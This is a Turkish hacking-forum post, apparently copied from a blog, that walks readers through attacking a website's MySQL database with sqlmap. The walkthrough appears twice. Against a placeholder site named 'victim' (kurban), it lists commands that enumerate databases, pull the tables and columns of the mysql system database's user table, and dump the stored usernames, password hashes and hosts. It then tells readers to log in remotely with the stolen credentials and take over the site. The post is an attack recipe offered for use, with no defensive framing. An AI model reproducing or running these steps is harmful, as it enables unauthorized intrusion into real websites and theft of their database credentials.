Sqlmap ile Mysql veritabanı Hack
Kaynak = http://www.securityhell.info/2017/09/22/sqlmap-mysql-hack/
Merhaba beyler, hemen konuya geçelim.
Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent --dbs
Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
Hemen mysql veritabanındaki tabloları çekiyoruz;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables
ve ardından User tablomuzdaki kolonları çekiyoruz;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns
Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump
ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
View hidden content is available for registered users!
Kaynak = http://www.securityhell.info/2017/09/22/sqlmap-mysql-hack/
Merhaba beyler, hemen konuya geçelim.
Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent --dbs
Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
Hemen mysql veritabanındaki tabloları çekiyoruz;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables
ve ardından User tablomuzdaki kolonları çekiyoruz;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns
Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump
ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
Son düzenleme: